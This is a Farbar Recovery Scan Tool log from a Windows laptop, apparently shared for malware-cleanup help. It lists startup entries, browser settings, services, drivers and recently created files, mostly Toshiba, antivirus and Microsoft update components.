HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [169896 2012-08-13] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [356776 2012-07-11] (TOSHIBA Corporation)
HKLM\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSleepSrv.exe [1548952 2012-08-04] (TOSHIBA Corporation)
HKLM\...\Run: [TODDMain] => C:\Program Files (x86)\TOSHIBA\System Setting\TODDMain.exe [213136 2012-08-04] ()
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [642216 2012-08-08] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-05-15] (Apple Inc.)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [570880 2013-12-27] (Nikon Corporation)
HKLM-x32\...\Run: [emsisoft anti-malware] => c:\program files (x86)\emsisoft anti-malware\a2guard.exe [4873248 2014-10-13] (Emsisoft GmbH)
Startup: C:\Users\Jeremy and Heidi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://facebook.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://mystart.toshiba.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://mystart.toshiba.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://mystart.toshiba.com
SearchScopes: HKLM - DefaultScope {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM-x32 - DefaultScope {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
SearchScopes: HKLM-x32 - {C043058C-5F2C-4C42-AB2F-8787D95BF238} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MATBJS
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 10.0.0.1

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Jeremy and Heidi\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

Chrome: 
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 a2AntiMalware; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [4816568 2014-10-13] (Emsisoft GmbH)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 GFNEXSrv; C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe [156672 2011-10-13] () [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89352 2014-09-15] (Hewlett-Packard Company)
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16056 2014-09-15] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 a2acc; C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2accx64.sys [71472 2014-05-12] (Emsisoft GmbH)
R1 A2DDA; C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [26176 2013-03-28] (Emsisoft GmbH)
R1 a2injectiondriver; C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys [45208 2013-09-30] (Emsisoft GmbH)
R1 a2util; C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys [23088 2014-05-12] (Emsisoft GmbH)
R2 APXACC; C:\Windows\system32\DRIVERS\appexDrv.sys [199008 2012-06-23] (AppEx Networks Corporation)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98472 2012-07-17] (Advanced Micro Devices)
S0 Avgboota; C:\Windows\System32\DRIVERS\avgboota.sys [20496 2013-09-04] (AVG Technologies CZ, s.r.o.)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpa; C:\Windows\system32\DRIVERS\avgwfpa.sys [273176 2014-07-18] (AVG Technologies CZ, s.r.o.)
R3 cleanhlp; C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [57024 2013-12-04] (Emsisoft GmbH)
S3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-27] (Malwarebytes Corporation)
R2 PEGAGFN; C:\Program Files (x86)\Toshiba\Password Utility\PEGAGFN.sys [14344 2009-09-11] (PEGATRON)
S3 RTL8192Ce; C:\Windows\system32\DRIVERS\rtwlane.sys [1496720 2012-08-13] (Realtek Semiconductor Corporation                           )
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [1496720 2012-08-13] (Realtek Semiconductor Corporation                           )
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [28632 2012-07-31] (Windows (R) Win 7 DDK provider)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 08:57 - 2014-11-01 08:57 - 00000000 ____D () C:\Users\Jeremy and Heidi\Downloads\FRST-OlderVersion
2014-10-30 22:22 - 2014-10-30 22:22 - 00359864 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-30 16:17 - 2014-09-29 15:49 - 00705480 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerApp.exe
2014-10-30 16:17 - 2014-09-29 15:49 - 00104904 _____ (Adobe Systems Incorporated) C:\windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-10-28 11:56 - 2014-10-28 11:56 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\AVS4YOU
2014-10-28 10:46 - 2014-10-28 11:37 - 356025256 _____ () C:\Users\Jeremy and Heidi\Downloads\mp4.mp4
2014-10-22 22:40 - 2014-10-23 08:27 - 00380416 _____ () C:\Users\Jeremy and Heidi\o2ik1mvb.exe
2014-10-21 18:46 - 2014-10-21 18:46 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Roaming\AVG2015
2014-10-21 18:44 - 2014-10-21 18:44 - 00001015 _____ () C:\Users\Public\Desktop\AVG 2015.lnk
2014-10-21 18:41 - 2014-10-22 19:31 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 17:08 - 2014-10-21 21:07 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\Avg2015
2014-10-17 10:07 - 2014-10-31 11:19 - 00001186 _____ () C:\Users\Jeremy and Heidi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware Guard.lnk
2014-10-16 16:14 - 2014-10-16 16:14 - 00001666 _____ () C:\Users\Jeremy and Heidi\Desktop\fixlist.txt
2014-10-16 12:18 - 2014-10-16 12:18 - 00000069 _____ () C:\windows\wininit.ini
2014-10-16 12:15 - 2014-10-16 12:15 - 00001318 _____ () C:\Users\Jeremy and Heidi\Desktop\Revo Uninstaller.lnk
2014-10-16 12:15 - 2014-10-16 12:15 - 00000000 ____D () C:\Program Files (x86)\VS Revo Group
2014-10-16 12:14 - 2014-10-16 12:14 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Jeremy and Heidi\Desktop\revosetup.exe
2014-10-15 23:11 - 2014-09-12 22:29 - 00079360 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-15 23:11 - 2014-09-12 21:02 - 00068096 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll
2014-10-15 23:11 - 2014-09-02 19:48 - 00510464 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll
2014-10-15 23:11 - 2014-09-02 19:21 - 00585728 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-15 23:11 - 2014-07-11 17:02 - 00478352 _____ () C:\windows\SysWOW64\locale.nls
2014-10-15 23:11 - 2014-07-11 17:00 - 00478352 _____ () C:\windows\system32\locale.nls
2014-10-15 23:11 - 2014-07-08 15:32 - 01539584 _____ (Microsoft Corporation) C:\windows\system32\storagewmi.dll
2014-10-15 23:11 - 2014-07-08 15:32 - 00340480 _____ (Microsoft Corporation) C:\windows\system32\defragsvc.dll
2014-10-15 23:11 - 2014-07-08 15:30 - 01220608 _____ (Microsoft Corporation) C:\windows\SysWOW64\storagewmi.dll
2014-10-15 23:11 - 2014-07-06 22:53 - 01125376 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe
2014-10-15 23:11 - 2014-07-06 22:52 - 03248128 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-15 23:11 - 2014-07-06 22:52 - 00724992 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-15 23:11 - 2014-07-06 22:52 - 00300544 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-15 23:11 - 2014-07-06 22:52 - 00263680 _____ (Microsoft Corporation) C:\windows\system32\wcmsvc.dll
2014-10-15 23:11 - 2014-07-06 22:52 - 00074752 _____ (Microsoft Corporation) C:\windows\system32\wcmcsp.dll
2014-10-15 23:11 - 2014-07-06 22:51 - 05982208 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-15 23:11 - 2014-07-06 21:01 - 01049600 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe
2014-10-15 23:11 - 2014-07-06 21:01 - 00233472 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll
2014-10-15 23:11 - 2014-07-06 21:00 - 05095424 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll
2014-10-15 23:11 - 2014-07-06 20:59 - 00269312 _____ (Microsoft Corporation) C:\windows\SysWOW64\aaclient.dll
2014-10-15 23:11 - 2014-07-04 03:52 - 00328000 _____ (Microsoft Corporation) C:\windows\system32\Drivers\volsnap.sys
2014-10-15 23:11 - 2014-07-02 18:59 - 01824784 _____ (Microsoft Corporation) C:\windows\system32\ntdll.dll
2014-10-15 23:11 - 2014-07-02 17:30 - 01408952 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntdll.dll
2014-10-15 23:11 - 2014-06-28 00:01 - 00096768 _____ (Microsoft Corporation) C:\windows\SysWOW64\dwmapi.dll
2014-10-15 23:11 - 2014-06-27 23:57 - 00209920 _____ (Microsoft Corporation) C:\windows\system32\profsvc.dll
2014-10-15 23:11 - 2014-06-27 23:56 - 00117248 _____ (Microsoft Corporation) C:\windows\system32\dwmapi.dll
2014-10-15 23:11 - 2014-06-25 00:09 - 00733184 _____ (Microsoft Corporation) C:\windows\system32\win32spl.dll
2014-10-15 23:11 - 2014-06-25 00:07 - 01023488 _____ (Microsoft Corporation) C:\windows\system32\localspl.dll
2014-10-15 23:11 - 2014-06-17 16:27 - 02032640 _____ (Microsoft Corporation) C:\windows\SysWOW64\d3d10warp.dll
2014-10-15 23:11 - 2014-06-17 16:23 - 02238464 _____ (Microsoft Corporation) C:\windows\system32\d3d10warp.dll
2014-10-15 23:11 - 2014-06-11 07:47 - 02842112 _____ (Microsoft Corporation) C:\windows\system32\WMVDECOD.DLL
2014-10-15 23:11 - 2014-06-10 21:40 - 02620928 _____ (Microsoft Corporation) C:\windows\SysWOW64\WMVDECOD.DLL
2014-10-15 23:11 - 2014-06-10 15:44 - 01403896 _____ (Microsoft Corporation) C:\windows\system32\winload.efi
2014-10-15 23:11 - 2014-05-29 16:31 - 00323072 _____ (Microsoft Corporation) C:\windows\SysWOW64\schannel.dll
2014-10-15 23:11 - 2014-05-29 16:03 - 00419328 _____ (Microsoft Corporation) C:\windows\system32\schannel.dll
2014-10-15 23:11 - 2014-02-04 03:57 - 01271664 _____ (Microsoft Corporation) C:\windows\system32\winload.exe
2014-10-15 23:10 - 2014-07-11 21:41 - 00008704 _____ (Microsoft Corporation) C:\windows\system32\KBDRUM.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL
2014-10-15 23:10 - 2014-07-11 21:41 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00008192 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRUM.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL
2014-10-15 23:10 - 2014-07-11 21:16 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL
2014-10-15 23:10 - 2014-07-11 21:15 - 00006144 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL
2014-10-15 23:10 - 2014-07-08 15:33 - 00181248 _____ (Microsoft Corp.) C:\windows\system32\Defrag.exe
2014-10-15 23:09 - 2014-09-19 22:18 - 00051712 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-15 23:09 - 2014-09-19 22:17 - 02236928 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-15 23:09 - 2014-09-19 22:17 - 01407488 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-15 23:09 - 2014-09-19 22:17 - 00915968 _____ (Microsoft Corporation) C:\windows\system32\uxtheme.dll
2014-10-15 23:09 - 2014-09-19 22:17 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\UXInit.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 19280896 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 15399424 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 03959296 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 02655232 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00855552 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00603136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00255488 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00197120 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00136704 _____ (Microsoft Corporation) C:\windows\system32\iesysprep.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00097280 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-15 23:09 - 2014-09-19 22:16 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-15 23:09 - 2014-09-19 22:15 - 01508864 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-15 23:09 - 2014-09-19 22:15 - 00451584 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-15 23:09 - 2014-09-19 22:15 - 00281600 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 14368768 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 13757952 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 02861568 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 02055168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 01762816 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 01180672 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00163840 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesysprep.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00080384 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00061440 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00044032 _____ (Microsoft Corporation) C:\windows\SysWOW64\UXInit.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00039936 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-10-15 23:09 - 2014-09-19 20:57 - 00033280 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-10-15 23:09 - 2014-09-19 20:56 - 01440768 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-10-15 23:09 - 2014-09-19 20:56 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-10-15 23:09 - 2014-09-19 20:56 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-10-15 23:09 - 2014-09-19 20:38 - 02706432 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-15 23:09 - 2014-09-19 20:33 - 02706432 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-10-15 23:09 - 2014-09-19 18:06 - 00534528 _____ (Microsoft Corporation) C:\windows\SysWOW64\uxtheme.dll
2014-10-15 23:09 - 2014-08-01 15:08 - 00388729 _____ () C:\windows\system32\ApnDatabase.xml
2014-10-15 23:09 - 2014-07-24 06:50 - 00447296 _____ (Microsoft Corporation) C:\windows\system32\Drivers\USBHUB3.SYS
2014-10-15 23:09 - 2014-07-16 16:28 - 00027648 _____ (Microsoft Corporation) C:\windows\SysWOW64\sscore.dll
2014-10-15 23:09 - 2014-07-16 15:59 - 00305664 _____ (Microsoft Corporation) C:\windows\system32\srvsvc.dll
2014-10-15 23:09 - 2014-07-16 15:59 - 00035840 _____ (Microsoft Corporation) C:\windows\system32\sscore.dll
2014-10-15 23:09 - 2014-07-11 23:45 - 01549824 _____ (Microsoft Corporation) C:\windows\system32\msdtctm.dll
2014-10-15 23:09 - 2014-07-11 21:36 - 00674304 _____ (Microsoft Corporation) C:\windows\system32\Drivers\srv2.sys
2014-10-15 23:09 - 2014-07-11 21:36 - 00211456 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb20.sys
2014-10-15 23:09 - 2014-07-11 21:34 - 00404480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\mrxsmb.sys
2014-10-15 23:09 - 2014-07-11 21:34 - 00250368 _____ (Microsoft Corporation) C:\windows\system32\Drivers\srvnet.sys
2014-10-15 23:09 - 2014-06-27 23:57 - 01341952 _____ (Microsoft Corporation) C:\windows\system32\user32.dll
2014-10-15 23:09 - 2014-06-27 19:23 - 01126400 _____ (Microsoft Corporation) C:\windows\SysWOW64\user32.dll
2014-10-15 23:08 - 2014-09-27 21:18 - 04068352 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-15 23:08 - 2014-08-29 22:48 - 10115072 _____ (Microsoft Corporation) C:\windows\system32\twinui.dll
2014-10-15 23:08 - 2014-08-29 22:47 - 02885632 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-10-15 23:08 - 2014-08-29 22:46 - 02306560 _____ (Microsoft Corporation) C:\windows\system32\authui.dll
2014-10-15 23:08 - 2014-08-29 21:05 - 08858112 _____ (Microsoft Corporation) C:\windows\SysWOW64\twinui.dll
2014-10-15 23:08 - 2014-08-29 21:04 - 02416128 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll
2014-10-15 23:08 - 2014-08-29 21:03 - 02037760 _____ (Microsoft Corporation) C:\windows\SysWOW64\authui.dll
2014-10-15 23:08 - 2014-06-12 16:34 - 00754176 _____ (Microsoft Corporation) C:\windows\SysWOW64\actxprxy.dll
2014-10-15 23:08 - 2014-06-12 16:29 - 02146304 _____ (Microsoft Corporation) C:\windows\system32\actxprxy.dll
2014-10-15 08:26 - 2014-10-15 08:27 - 00000000 ____D () C:\Users\Jeremy and Heidi\AppData\Local\CutePDF Writer
2014-10-14 20:45 - 2014-10-14 20:45 - 00000000 ____D () C:\Users\Jeremy and Heidi\Desktop\tdsskiller
2014-10-14 19:31 - 2014-10-14 19:34 - 00060245 _____ () C:\Users\Jeremy and Heidi\Downloads\Addition.txt
2014-10-14 19:30 - 2014-11-01 08:57 - 00014613 _____ () C:\Users\Jeremy and Heidi\Downloads\FRST.txt
2014-10-14 19:29 - 2014-11-01 08:57 - 02114048 _____ (Farbar) C:\Users\Jeremy and Heidi\Downloads\FRST64.exe
2014-10-14 12:37 - 2014-11-01 08:57 - 00000000 ____D () C:\FRST
2014-10-14 12:30 - 2014-10-14 12:32 - 04161313 _____ () C:\Users\Jeremy and Heidi\Desktop\tdsskiller.zip
2014-10-14 12:27 - 2014-10-14 12:28 - 00380416 _____ () C:\Users\Jeremy and Heidi\Desktop\vu0ul4gn.exe
2014-10-13 10:48 - 2014-10-27 15:53 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-13 10:44 - 2014-10-20 10:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
